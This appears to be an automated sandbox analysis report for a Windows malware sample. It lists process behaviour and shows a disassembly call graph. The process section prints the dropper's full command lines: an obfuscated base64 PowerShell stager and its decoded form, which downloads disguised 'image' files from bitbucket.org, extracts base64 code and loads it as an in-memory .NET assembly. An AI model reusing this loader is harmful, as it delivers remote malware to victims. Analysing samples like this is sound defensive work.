                                                                                                              2024-10-02 17:02:44 UTC2627INData Raw: 73 2d 75 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 69 70 65 6c 69 6e 65 73 2d 64 65 70 6c 6f 79 6d 65 6e 74 73 2d 73 65 74 74 69 6e 67 73 2d 75 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 69 70 65 6c 69 6e 65 73 2d 72 75 6e 6e 65 72 73 2d 73 65 74 74 69 6e 67 73 2d 75 69 2d 69 6e 2d 66 72 6f 6e 74 62 75 63 6b 65 74 22 3a 20 74 72 75 65 2c 20 22 70 72 2d 64 65 70 65 6e 64 65 6e 63 69 65 73 22 3a 20 66 61 6c 73 65 2c 20 22 63 6f 6d 6d 69 74 2d 65 78 70 61 6e 64 2d 69 6e 6e 6f 22 3a 20 66 61 6c 73 65 2c 20 22 73 79 6e 74 61 78 2d 68 69 67 68 6c 69 67 68 74 69 6e 67 22 3a 20 66 61 6c 73 65 2c 20 22 63 72 65 61 74 65 2d 77 6f 72 6b 73 70 61 63 65 2d 73 68 6f 77 2d 72 65 63 61 70 74 63
                                                                                                              Data Ascii: s-ui-in-frontbucket": true, "pipelines-deployments-settings-ui-in-frontbucket": true, "pipelines-runners-settings-ui-in-frontbucket": true, "pr-dependencies": false, "commit-expand-inno": false, "syntax-highlighting": false, "create-workspace-show-recaptc


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:13:02:37
                                                                                                              Start date:02/10/2024
                                                                                                              Path:C:\Users\user\Desktop\nTHivMbGpg.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\Desktop\nTHivMbGpg.exe"
                                                                                                              Imagebase:0x7ff6fd210000
                                                                                                              File size:192'512 bytes
                                                                                                              MD5 hash:8D797E4C1866E6542705A564B7FDA527
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:1
                                                                                                              Start time:13:02:37
                                                                                                              Start date:02/10/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c 124.bat
                                                                                                              Imagebase:0x7ff627de0000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:2
                                                                                                              Start time:13:02:37
                                                                                                              Start date:02/10/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:4
                                                                                                              Start time:13:02:38
                                                                                                              Start date:02/10/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#H##bgBn#FM#bwBl#G0#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#ZwBm#GQ#LwB3#Gc#Z#Bz#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                                                                                                              Imagebase:0x7ff741d30000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:5
                                                                                                              Start time:13:02:40
                                                                                                              Start date:02/10/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
                                                                                                              Imagebase:0x7ff741d30000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:12
                                                                                                              Start time:13:02:46
                                                                                                              Start date:02/10/2024
                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
                                                                                                              Imagebase:0x7ff7604d0000
                                                                                                              File size:71'680 bytes
                                                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:25%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:43.1%
                                                                                                                Total number of Nodes:981
                                                                                                                Total number of Limit Nodes:49
                                                                                                                execution_graph 3133 7ff6fd21366e 3134 7ff6fd213946 EndDialog 3133->3134 3135 7ff6fd213697 3133->3135 3138 7ff6fd2136ab 3134->3138 3136 7ff6fd2136a7 3135->3136 3137 7ff6fd2138c2 GetDesktopWindow 3135->3137 3136->3138 3140 7ff6fd2136bb 3136->3140 3141 7ff6fd213775 GetDlgItemTextA 3136->3141 3185 7ff6fd214dc8 6 API calls 3137->3185 3143 7ff6fd213758 EndDialog 3140->3143 3144 7ff6fd2136c4 3140->3144 3150 7ff6fd21379e 3141->3150 3166 7ff6fd213829 3141->3166 3143->3138 3144->3138 3146 7ff6fd2136d1 LoadStringA 3144->3146 3145 7ff6fd21391c GetDlgItem EnableWindow 3145->3138 3147 7ff6fd2136fd 3146->3147 3148 7ff6fd21371e 3146->3148 3153 7ff6fd214f2c 24 API calls 3147->3153 3170 7ff6fd214b70 LoadLibraryA 3148->3170 3149 7ff6fd214f2c 24 API calls 3149->3138 3152 7ff6fd2137d4 GetFileAttributesA 3150->3152 3150->3166 3155 7ff6fd2137e8 3152->3155 3156 7ff6fd21383a 3152->3156 3169 7ff6fd213717 3153->3169 3158 7ff6fd214f2c 24 API calls 3155->3158 3160 7ff6fd217e08 CharPrevA 3156->3160 3157 7ff6fd21372b SetDlgItemTextA 3157->3138 3157->3147 3162 7ff6fd21380b 3158->3162 3159 7ff6fd21388f EndDialog 3159->3138 3161 7ff6fd21384e 3160->3161 3163 7ff6fd216d9c 31 API calls 3161->3163 3162->3138 3164 7ff6fd213814 CreateDirectoryA 3162->3164 3165 7ff6fd213856 3163->3165 3164->3156 3164->3166 3165->3166 3167 7ff6fd213861 3165->3167 3166->3149 3168 7ff6fd216f14 38 API calls 3167->3168 3168->3169 3169->3138 3169->3159 3171 7ff6fd214d7f 3170->3171 3172 7ff6fd214bb4 GetProcAddress 3170->3172 3175 7ff6fd214f2c 24 API calls 3171->3175 3173 7ff6fd214bd6 GetProcAddress 3172->3173 3174 7ff6fd214d69 FreeLibrary 3172->3174 3173->3174 3176 7ff6fd214bfb GetProcAddress 3173->3176 3174->3171 3177 7ff6fd213723 3175->3177 3176->3174 3178 7ff6fd214c1d 3176->3178 3177->3138 3177->3157 3179 7ff6fd214c31 GetTempPathA 3178->3179 3184 7ff6fd214c7f FreeLibrary 3178->3184 3180 7ff6fd214c46 3179->3180 3180->3180 3181 7ff6fd214c4e CharPrevA 3180->3181 3183 7ff6fd214c68 CharPrevA 3181->3183 3181->3184 3183->3184 3184->3177 3186 7ff6fd214e9f SetWindowPos 3185->3186 3188 7ff6fd2186f0 7 API calls 3186->3188 3189 7ff6fd2138d9 SetWindowTextA SendDlgItemMessageA 3188->3189 3189->3138 3189->3145 3190 7ff6fd21146e 3191 7ff6fd2114c7 GetDesktopWindow 3190->3191 3192 7ff6fd2114a0 3190->3192 3193 7ff6fd214dc8 14 API calls 3191->3193 3195 7ff6fd2114b2 EndDialog 3192->3195 3196 7ff6fd2114c3 3192->3196 3194 7ff6fd2114de LoadStringA SetDlgItemTextA MessageBeep 3193->3194 3194->3196 3195->3196 3197 7ff6fd2186f0 7 API calls 3196->3197 3198 7ff6fd211540 3197->3198 3199 7ff6fd215aae GlobalAlloc 2249 7ff6fd215af1 2250 7ff6fd215b3c 2249->2250 2251 7ff6fd215b25 2249->2251 2252 7ff6fd215b33 2250->2252 2255 7ff6fd215c36 2250->2255 2256 7ff6fd215b52 2250->2256 2251->2252 2253 7ff6fd2159b0 CloseHandle 2251->2253 2305 7ff6fd2186f0 2252->2305 2253->2252 2257 7ff6fd215c42 SetDlgItemTextA 2255->2257 2259 7ff6fd215c57 2255->2259 2256->2252 2261 7ff6fd215b93 DosDateTimeToFileTime 2256->2261 2257->2259 2259->2252 2277 7ff6fd2153b8 GetFileAttributesA 2259->2277 2261->2252 2263 7ff6fd215bb0 LocalFileTimeToFileTime 2261->2263 2263->2252 2264 7ff6fd215bce SetFileTime 2263->2264 2264->2252 2266 7ff6fd215bf6 2264->2266 2274 7ff6fd2159b0 2266->2274 2269 7ff6fd215ca8 2296 7ff6fd215478 LocalAlloc 2269->2296 2275 7ff6fd2159cf SetFileAttributesA 2274->2275 2276 7ff6fd2159e4 CloseHandle 2274->2276 2275->2252 2276->2275 2278 7ff6fd21545b 2277->2278 2280 7ff6fd2153da 2277->2280 2278->2252 2284 7ff6fd2155c0 2278->2284 2279 7ff6fd215442 SetFileAttributesA 2279->2278 2280->2278 2280->2279 2313 7ff6fd217d28 FindResourceA 2280->2313 2283 7ff6fd215438 2283->2279 2285 7ff6fd2155f3 2284->2285 2286 7ff6fd21563d lstrcmpA 2285->2286 2287 7ff6fd215610 2285->2287 2289 7ff6fd215634 2286->2289 2290 7ff6fd215694 2286->2290 2288 7ff6fd214f2c 24 API calls 2287->2288 2288->2289 2289->2252 2289->2269 2290->2289 2291 7ff6fd2156e8 CreateFileA 2290->2291 2291->2289 2293 7ff6fd21571e 2291->2293 2292 7ff6fd2157a1 CreateFileA 2292->2289 2293->2289 2293->2292 2294 7ff6fd215789 CharNextA 2293->2294 2295 7ff6fd215772 CreateDirectoryA 2293->2295 2294->2293 2295->2294 2297 7ff6fd2154a6 2296->2297 2298 7ff6fd2154d0 LocalAlloc 2296->2298 2299 7ff6fd214f2c 24 API calls 2297->2299 2301 7ff6fd2154ff 2298->2301 2304 7ff6fd2154c9 2298->2304 2299->2304 2302 7ff6fd214f2c 24 API calls 2301->2302 2303 7ff6fd215522 LocalFree 2302->2303 2303->2304 2304->2252 2306 7ff6fd2186f9 2305->2306 2307 7ff6fd215cdb 2306->2307 2308 7ff6fd218750 RtlCaptureContext RtlLookupFunctionEntry 2306->2308 2309 7ff6fd2187d7 2308->2309 2310 7ff6fd218795 RtlVirtualUnwind 2308->2310 2368 7ff6fd218714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2309->2368 2310->2309 2314 7ff6fd217dc3 2313->2314 2315 7ff6fd217d63 LoadResource 2313->2315 2321 7ff6fd214f2c 2314->2321 2315->2314 2317 7ff6fd217d7d DialogBoxIndirectParamA FreeResource 2315->2317 2317->2314 2320 7ff6fd215424 2317->2320 2320->2278 2320->2279 2320->2283 2322 7ff6fd215105 2321->2322 2323 7ff6fd214fa5 LoadStringA 2321->2323 2327 7ff6fd2186f0 7 API calls 2322->2327 2324 7ff6fd214fcf 2323->2324 2325 7ff6fd215011 2323->2325 2350 7ff6fd218154 2324->2350 2326 7ff6fd21508d 2325->2326 2333 7ff6fd21501d LocalAlloc 2325->2333 2335 7ff6fd2150e6 LocalAlloc 2326->2335 2336 7ff6fd2150a0 LocalAlloc 2326->2336 2329 7ff6fd2151dd 2327->2329 2329->2320 2331 7ff6fd214fdd MessageBoxA 2331->2322 2333->2322 2340 7ff6fd215070 2333->2340 2335->2322 2346 7ff6fd215088 MessageBeep 2335->2346 2336->2322 2339 7ff6fd2150d1 2336->2339 2343 7ff6fd2110bc _vsnprintf 2339->2343 2365 7ff6fd2110bc 2340->2365 2342 7ff6fd218154 13 API calls 2345 7ff6fd215173 2342->2345 2343->2346 2347 7ff6fd21517c MessageBoxA LocalFree 2345->2347 2348 7ff6fd218084 2 API calls 2345->2348 2346->2342 2347->2322 2348->2347 2351 7ff6fd218194 GetVersionExA 2350->2351 2352 7ff6fd2182c6 2350->2352 2351->2352 2353 7ff6fd2181bd 2351->2353 2354 7ff6fd2186f0 7 API calls 2352->2354 2353->2352 2356 7ff6fd2181e0 GetSystemMetrics 2353->2356 2355 7ff6fd214fd4 2354->2355 2355->2331 2361 7ff6fd218084 2355->2361 2356->2352 2357 7ff6fd2181f7 RegOpenKeyExA 2356->2357 2357->2352 2358 7ff6fd21822c RegQueryValueExA RegCloseKey 2357->2358 2358->2352 2360 7ff6fd218276 2358->2360 2359 7ff6fd2182b5 CharNextA 2359->2360 2360->2352 2360->2359 2362 7ff6fd21812d 2361->2362 2363 7ff6fd2180aa EnumResourceLanguagesA 2361->2363 2362->2331 2363->2362 2364 7ff6fd2180ef EnumResourceLanguagesA 2363->2364 2364->2362 2366 7ff6fd2110eb _vsnprintf 2365->2366 2367 7ff6fd2110dc 2365->2367 2366->2367 2367->2346 3200 7ff6fd218df0 _XcptFilter 3201 7ff6fd21351e 3202 7ff6fd21361c 3201->3202 3203 7ff6fd213532 3201->3203 3204 7ff6fd213615 3202->3204 3205 7ff6fd213625 SendDlgItemMessageA 3202->3205 3207 7ff6fd213571 GetDesktopWindow 3203->3207 3209 7ff6fd21353f 3203->3209 3205->3204 3206 7ff6fd213560 EndDialog 3206->3204 3208 7ff6fd214dc8 14 API calls 3207->3208 3210 7ff6fd213588 6 API calls 3208->3210 3209->3204 3209->3206 3210->3204 3211 7ff6fd215a1e 3212 7ff6fd215a28 3211->3212 3213 7ff6fd215a7d SetFilePointer 3212->3213 3214 7ff6fd215a3c 3212->3214 3213->3214 3215 7ff6fd21845e 3216 7ff6fd218478 GetStartupInfoW 3215->3216 3217 7ff6fd2184ab 3216->3217 3218 7ff6fd2184bd 3217->3218 3219 7ff6fd2184da Sleep 3217->3219 3220 7ff6fd2184e7 3218->3220 3221 7ff6fd2184cd _amsg_exit 3218->3221 3219->3217 3222 7ff6fd218569 _initterm 3220->3222 3223 7ff6fd21854a 3220->3223 3225 7ff6fd218586 _IsNonwritableInCurrentImage 3220->3225 3221->3220 3222->3225 3224 7ff6fd21866f _ismbblead 3224->3225 3225->3224 3226 7ff6fd2185f4 3225->3226 3227 7ff6fd212d70 292 API calls 3226->3227 3228 7ff6fd21862f 3227->3228 3229 7ff6fd218646 3228->3229 3230 7ff6fd21863e exit 3228->3230 3229->3223 3231 7ff6fd21864f _cexit 3229->3231 3230->3229 3231->3223 3232 7ff6fd21831e 3233 7ff6fd218332 3232->3233 3239 7ff6fd218aa8 GetModuleHandleW 3233->3239 3235 7ff6fd218399 __set_app_type 3236 7ff6fd2183d6 3235->3236 3237 7ff6fd2183ec 3236->3237 3238 7ff6fd2183df __setusermatherr 3236->3238 3238->3237 3240 7ff6fd218abd 3239->3240 3240->3235 3241 7ff6fd218a1e SetUnhandledExceptionFilter 3242 7ff6fd215820 3243 7ff6fd215881 ReadFile 3242->3243 3244 7ff6fd21584d 3242->3244 3243->3244 2369 7ff6fd218460 2388 7ff6fd218bf4 2369->2388 2373 7ff6fd2184ab 2374 7ff6fd2184bd 2373->2374 2375 7ff6fd2184da Sleep 2373->2375 2376 7ff6fd2184cd _amsg_exit 2374->2376 2380 7ff6fd2184e7 2374->2380 2375->2373 2376->2380 2377 7ff6fd218569 _initterm 2378 7ff6fd218586 _IsNonwritableInCurrentImage 2377->2378 2379 7ff6fd21866f _ismbblead 2378->2379 2381 7ff6fd2185f4 2378->2381 2379->2378 2380->2377 2380->2378 2386 7ff6fd21854a 2380->2386 2392 7ff6fd212d70 GetVersion 2381->2392 2384 7ff6fd218646 2384->2386 2387 7ff6fd21864f _cexit 2384->2387 2385 7ff6fd21863e exit 2385->2384 2387->2386 2389 7ff6fd218c20 6 API calls 2388->2389 2390 7ff6fd218469 GetStartupInfoW 2388->2390 2391 7ff6fd218c9f 2389->2391 2390->2373 2391->2390 2393 7ff6fd212d97 2392->2393 2394 7ff6fd212de9 2392->2394 2393->2394 2395 7ff6fd212d9b GetModuleHandleW 2393->2395 2416 7ff6fd212edc 2394->2416 2395->2394 2397 7ff6fd212db3 GetProcAddress 2395->2397 2397->2394 2399 7ff6fd212dce 2397->2399 2399->2394 2400 7ff6fd212ea5 2401 7ff6fd212ebd 2400->2401 2402 7ff6fd212eb1 CloseHandle 2400->2402 2401->2384 2401->2385 2402->2401 2407 7ff6fd212e59 2410 7ff6fd214f2c 24 API calls 2407->2410 2408 7ff6fd212e84 2411 7ff6fd212e8d ExitWindowsEx 2408->2411 2412 7ff6fd212ea0 2408->2412 2415 7ff6fd212e7f 2410->2415 2411->2400 2532 7ff6fd211bf4 GetCurrentProcess OpenProcessToken 2412->2532 2414 7ff6fd212e4f 2414->2400 2414->2407 2414->2408 2415->2400 2415->2408 2417 7ff6fd218da9 2416->2417 2418 7ff6fd212f21 memset memset 2417->2418 2540 7ff6fd2151f8 FindResourceA SizeofResource 2418->2540 2421 7ff6fd212f7b CreateEventA SetEvent 2423 7ff6fd2151f8 7 API calls 2421->2423 2422 7ff6fd2130dd 2425 7ff6fd214f2c 24 API calls 2422->2425 2424 7ff6fd212fba 2423->2424 2426 7ff6fd212fbe 2424->2426 2428 7ff6fd212ffd 2424->2428 2430 7ff6fd2130cb 2424->2430 2427 7ff6fd213101 2425->2427 2432 7ff6fd214f2c 24 API calls 2426->2432 2429 7ff6fd2186f0 7 API calls 2427->2429 2431 7ff6fd2151f8 7 API calls 2428->2431 2434 7ff6fd212dfa 2429->2434 2545 7ff6fd217320 2430->2545 2436 7ff6fd213014 2431->2436 2433 7ff6fd212fdc 2432->2433 2433->2427 2434->2400 2462 7ff6fd213214 2434->2462 2436->2426 2438 7ff6fd213026 CreateMutexA 2436->2438 2438->2430 2440 7ff6fd21304a GetLastError 2438->2440 2439 7ff6fd2130ec 2441 7ff6fd213106 FindResourceExA 2439->2441 2442 7ff6fd2130f5 2439->2442 2440->2430 2443 7ff6fd21305d 2440->2443 2445 7ff6fd213127 LoadResource 2441->2445 2446 7ff6fd21313c 2441->2446 2572 7ff6fd212034 2442->2572 2447 7ff6fd21308a 2443->2447 2448 7ff6fd213072 2443->2448 2445->2446 2450 7ff6fd213151 2446->2450 2451 7ff6fd213145 #17 2446->2451 2452 7ff6fd214f2c 24 API calls 2447->2452 2449 7ff6fd214f2c 24 API calls 2448->2449 2453 7ff6fd213088 2449->2453 2450->2427 2454 7ff6fd213162 2450->2454 